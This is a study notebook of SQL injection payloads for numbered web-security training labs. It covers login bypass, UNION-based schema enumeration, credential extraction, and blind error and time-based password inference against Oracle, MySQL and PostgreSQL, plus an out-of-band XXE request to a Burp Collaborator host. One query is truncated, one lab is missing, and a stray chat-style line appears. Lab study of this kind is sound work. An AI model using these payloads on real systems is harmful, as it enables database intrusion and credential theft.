[SQL injection cheat sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet) ##### SQL Injection – Bypass `released = 1` filter via `category` param ``` ' OR 1=1-- ``` Context: Injected into `category` query parameter Encoding: URL-decoded in server-side SQL statement Source: [[1. SQL injection vulnerability in WHERE clause allowing retrieval of hidden data]] --- ##### SQL Injection – Bypass login via `username` field ``` administrator'-- ``` Context: Injected into `username` field of login form Encoding: None – raw SQL concatenation Source: [[2. SQL injection vulnerability allowing login bypass]] --- ##### SQL Injection – Extract DB version via UNION on Oracle ``` '+UNION+SELECT+BANNER,+NULL+FROM+v$version-- ``` Context: Injected into `category` query parameter; Oracle SQL backend Encoding: URL-encoded in HTTP GET request Source: [[3. SQL injection attack, querying the database type and version on Oracle]] --- ##### SQL Injection – Retrieve DB version via `@@version` (MySQL / MSSQL) ``` '+UNION+SELECT+@@version,+NULL# ``` Context: Injected into `category` query param; UNION SELECT with 2 text columns Encoding: URL-encoded in HTTP GET request Source: [[4. SQL injection attack, querying the database type and version on MySQL and Microsoft]] --- ##### SQL Injection – Full DB enumeration via `information_schema` (non-Oracle) ``` '+UNION+SELECT+username,<password_column>+FROM+<user_table>-- ``` Supporting queries: - **Determine column count & type**: ``` '+UNION+SELECT+'a','b'-- ``` - **List tables**: ``` '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables-- ``` - **List columns** (adjust table name): ``` '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='<user_table>'-- ``` Context: Injected into `category` query parameter; 2-column UNION SELECT Encoding: URL-encoded in HTTP GET request Source: [[5. SQL injection attack, listing the database contents on non-Oracle databases]] --- ##### SQL Injection – Extract admin creds via Oracle `all_tables` and `all_tab_columns` ``` '+UNION+SELECT+USERNAME_DEFISP,PASSWORD_IXHNTC+FROM+USERS_QGUNNK-- ``` Supporting enumeration queries: - **Confirm column count (2 text fields)**: ``` '+UNION+SELECT+'abc','def'+FROM+dual-- ``` - **List all tables**: ``` '+UNION+SELECT+table_name,NULL+FROM+all_tables-- ``` - **List columns in discovered table**: ``` '+UNION+SELECT+column_name,NULL+FROM+all_t ``` Context: Injected into `category` query parameter; Oracle SQL backend Encoding: URL-encoded in HTTP GET request Source: [[6. SQL injection attack, listing the database contents on Oracle]] ##### SQL Injection – Determine column count via `NULL`-based UNION probing ``` '+UNION+SELECT+NULL,NULL,NULL-- ``` Context: Injected into `category` query parameter; increasing `NULL`s to match column count Encoding: URL-encoded in HTTP GET request Source: [[7. SQL injection UNION attack, determining the number of columns returned by the query]] ##### SQL Injection – Identify text-compatible column via string injection ``` '+UNION+SELECT+NULL,'tO0HJO',NULL-- ``` Context: Injected into `category` query param; probing for string-compatible column Encoding: URL-encoded in HTTP GET request Source: [[8. SQL injection UNION attack, finding a column containing text]] --- ##### SQL Injection – Extract `administrator` credentials from `users` via UNION ``` '+UNION+SELECT+username,password+FROM+users-- ``` Context: Injected into `category` query parameter; UNION SELECT over 2 text-compatible columns Encoding: URL-encoded in HTTP GET request Source: [[9. SQL injection UNION attack, retrieving data from other tables]] Here’s the compendium slice for this lab focused on extracting **multiple values via single-column output** using string concatenation: --- ##### SQL Injection – Extract credentials via concatenation into single text column ``` '+UNION+SELECT+NULL,username||'~'||password+FROM+users-- ``` Context: Injected into `category` query parameter; 2-column query where only **one** supports text output Encoding: URL-encoded in HTTP GET request Source: [[10. SQL injection UNION attack, retrieving multiple values in a single column]] --- ##### Blind SQL Injection – Oracle error-based password extraction via `TrackingId` cookie ``` TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||' ``` Context: Injected into `TrackingId` cookie; Oracle SQL; inference via **conditional 500 error** (division by zero) Encoding: Raw cookie injection Source: [[12. Blind SQL injection with conditional errors]] --- ##### SQL Injection – Leak admin password via error-based casting in cookie ``` TrackingId=' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)-- ``` Context: Injected into `TrackingId` cookie; verbose SQL errors in response expose query structure and data Encoding: Raw cookie injection Source: [[13. Visible error-based SQL injection]] --- ##### Blind SQL Injection – Trigger conditional delay via `pg_sleep()` (PostgreSQL) ``` TrackingId=x'||pg_sleep(10)-- ``` Context: Injected into `TrackingId` cookie; PostgreSQL backend Encoding: Raw cookie injection Source: [[14. Blind SQL injection with time delays]] --- ##### Blind SQL Injection – Extract admin password via `pg_sleep()` timing (PostgreSQL) ``` TrackingId=x';SELECT CASE WHEN (username='administrator' AND SUBSTRING(password,1,1)='a') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users-- ``` Context: Injected into `TrackingId` cookie; **no visible output**, but inference via **response delay** Encoding: URL-encoded (`%3B` for `;`, etc.); raw value when testing in Burp Source: [[15. Blind SQL injection with time delays and information retrieval]] --- ##### Blind SQL Injection – Oracle `EXTRACTVALUE()` triggers OOB DNS via XXE ``` TrackingId=x';SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://<YOUR-COLLABORATOR-ID>.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual-- ``` Context: Injected into `TrackingId` cookie; **blind SQLi with DNS-based out-of-band verification** via Burp Collaborator Encoding: URL-encoded (`%3C`, `%3E`, `%3F`, etc.); raw value when testing in Burp Source: [[16. Blind SQL injection with out-of-band interaction]]